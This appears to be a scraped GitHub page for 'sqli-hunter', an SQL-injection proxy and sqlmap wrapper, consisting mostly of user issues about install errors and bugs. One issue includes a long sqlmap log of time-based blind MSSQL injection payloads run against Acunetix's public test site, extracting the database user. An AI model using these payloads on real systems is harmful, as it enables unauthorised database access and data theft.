zt2 / sqli-hunter Goto Github PK
View Code? Open in Web Editor NEWSQLi-Hunter is a simple HTTP / HTTPS proxy server and a SQLMAP API wrapper that makes digging SQLi easy.
SQLi-Hunter is a simple HTTP / HTTPS proxy server and a SQLMAP API wrapper that makes digging SQLi easy.
Traceback (most recent call last):
7: from sqli-hunter.rb:13:in `<main>'
6: from sqli-hunter.rb:13:in `require_relative'
5: from /root/soft/web/sqli-hunter/lib/hunter.rb:6:in `<top (required)>'
4: from /root/soft/web/sqli-hunter/lib/hunter.rb:15:in `<module:Hunter>'
3: from /root/soft/web/sqli-hunter/lib/hunter.rb:15:in `require_relative'
2: from /root/soft/web/sqli-hunter/lib/hunter/proxy.rb:6:in `<top (required)>'
1: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
/usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require': cannot load such file -- ritm (LoadError)
dont start... on kali linux
please help me
not running sqli-hunter
send request and log:
โโ$ sudo ruby bin/sqli-hunter.rb
[sudo] password for kernel:
/var/lib/gems/3.0.0/gems/bundler-2.1.4/lib/bundler/spec_set.rb:86:in block in materialize': Could not find activemodel-6.0.3.2 in any of the sources (Bundler::GemNotFound) from /var/lib/gems/3.0.0/gems/bundler-2.1.4/lib/bundler/spec_set.rb:80:in
map!'
from /var/lib/gems/3.0.0/gems/bundler-2.1.4/lib/bundler/spec_set.rb:80:in materialize' from /var/lib/gems/3.0.0/gems/bundler-2.1.4/lib/bundler/definition.rb:170:in
specs'
from /var/lib/gems/3.0.0/gems/bundler-2.1.4/lib/bundler/definition.rb:237:in specs_for' from /var/lib/gems/3.0.0/gems/bundler-2.1.4/lib/bundler/definition.rb:226:in
requested_specs'
from /var/lib/gems/3.0.0/gems/bundler-2.1.4/lib/bundler/runtime.rb:101:in block in definition_method' from /var/lib/gems/3.0.0/gems/bundler-2.1.4/lib/bundler/runtime.rb:20:in
setup'
from /var/lib/gems/3.0.0/gems/bundler-2.1.4/lib/bundler.rb:149:in setup' from /home/kernel/Desktop/Hacking/sqli-hunter/lib/hunter/proxy.rb:9:in
<top (required)>'
from /home/kernel/Desktop/Hacking/sqli-hunter/lib/hunter.rb:15:in require_relative' from /home/kernel/Desktop/Hacking/sqli-hunter/lib/hunter.rb:15:in
module:Hunter'
from /home/kernel/Desktop/Hacking/sqli-hunter/lib/hunter.rb:6:in <top (required)>' from bin/sqli-hunter.rb:13:in
require_relative'
from bin/sqli-hunter.rb:13:in `
when presented with the message that a vulnerability has been found, the message does not include the path to the request file anymore:
[13:13:43] [986bb890c31af76f] Task vulnerable, use "sqlmap -r false" to exploit
root@kali:~# sqlmap -u http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 --flush-session --dbms=mssql --tamper=substr2lr.py --current-user -v3
(...snip...)
[12:26:56] [INFO] fetching current user
[12:26:56] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>64) WAITFOR DELAY '0:0:4'
[12:27:01] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>96) WAITFOR DELAY '0:0:4'
[12:27:05] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>112) WAITFOR DELAY '0:0:4'
[12:27:05] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>104) WAITFOR DELAY '0:0:4'
[12:27:08] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>108) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>106) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>105) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))!=105) WAITFOR DELAY '0:0:4'
[12:27:14] [ERROR] invalid character detected. retrying..
[12:27:14] [WARNING] increasing time delay to 5 seconds
[12:27:14] [DEBUG] turning off time auto-adjustment mechanism
[12:27:14] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>64) WAITFOR DELAY '0:0:5'
[12:27:19] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:24] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:25] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>104) WAITFOR DELAY '0:0:5'
[12:27:25] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>100) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>98) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>97) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))!=97) WAITFOR DELAY '0:0:5'
[12:27:27] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:32] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:32] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>104) WAITFOR DELAY '0:0:5'
[12:27:33] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>100) WAITFOR DELAY '0:0:5'
[12:27:33] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>98) WAITFOR DELAY '0:0:5'
[12:27:38] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>99) WAITFOR DELAY '0:0:5'
[12:27:38] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))!=99) WAITFOR DELAY '0:0:5'
[12:27:39] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:44] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:49] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>120) WAITFOR DELAY '0:0:5'
[12:27:50] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>116) WAITFOR DELAY '0:0:5'
[12:27:55] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>118) WAITFOR DELAY '0:0:5'
[12:27:55] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>117) WAITFOR DELAY '0:0:5'
[12:27:56] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))!=117) WAITFOR DELAY '0:0:5'
[12:27:56] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:01] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:02] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>104) WAITFOR DELAY '0:0:5'
[12:28:07] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>108) WAITFOR DELAY '0:0:5'
[12:28:12] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>110) WAITFOR DELAY '0:0:5'
[12:28:13] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>109) WAITFOR DELAY '0:0:5'
[12:28:18] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))!=110) WAITFOR DELAY '0:0:5'
[12:28:18] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>104) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>100) WAITFOR DELAY '0:0:5'
[12:28:29] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>102) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>101) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))!=101) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:36] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:41] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>120) WAITFOR DELAY '0:0:5'
[12:28:41] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>116) WAITFOR DELAY '0:0:5'
[12:28:42] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>114) WAITFOR DELAY '0:0:5'
[12:28:47] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>115) WAITFOR DELAY '0:0:5'
[12:28:52] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))!=116) WAITFOR DELAY '0:0:5'
[12:28:53] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:58] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:58] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>104) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>108) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>106) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>105) WAITFOR DELAY '0:0:5'
[12:29:05] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))!=105) WAITFOR DELAY '0:0:5'
[12:29:05] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>96) WAITFOR DELAY '0:0:5'
[12:29:10] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>112) WAITFOR DELAY '0:0:5'
[12:29:16] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>120) WAITFOR DELAY '0:0:5'
[12:29:16] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>116) WAITFOR DELAY '0:0:5'
[12:29:21] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>118) WAITFOR DELAY '0:0:5'
[12:29:27] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>119) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))!=120) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>96) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>48) WAITFOR DELAY '0:0:5'
[12:29:33] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>1) WAITFOR DELAY '0:0:5'
[12:29:33] [INFO] retrieved: acunetix
[12:29:33] [DEBUG] performed 68 queries in 156.57 seconds
current user: 'acunetix'
[12:29:33] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[12:29:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testaspnet.vulnweb.com'
This is a good project! I found that I can't grab https packets, how can I improve it?
/var/lib/gems/2.7.0/gems/certificate_authority-0.1.6/lib/certificate_authority/certificate.rb:94: warning: constant OpenSSL::Digest::Digest is deprecated
/var/lib/gems/2.7.0/gems/certificate_authority-0.1.6/lib/certificate_authority/certificate.rb:96: warning: constant OpenSSL::Digest::Digest is deprecated
The program just outputs this and than does nothing.
How to reproduce?
Build the program yourself/install through docker and than run the command including " --targeted-hosts" parameter.
Edit: I fixed those warnings but now it just stays at [INFO] Proxy server started ... listening on localhost:8080 and does nothing.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.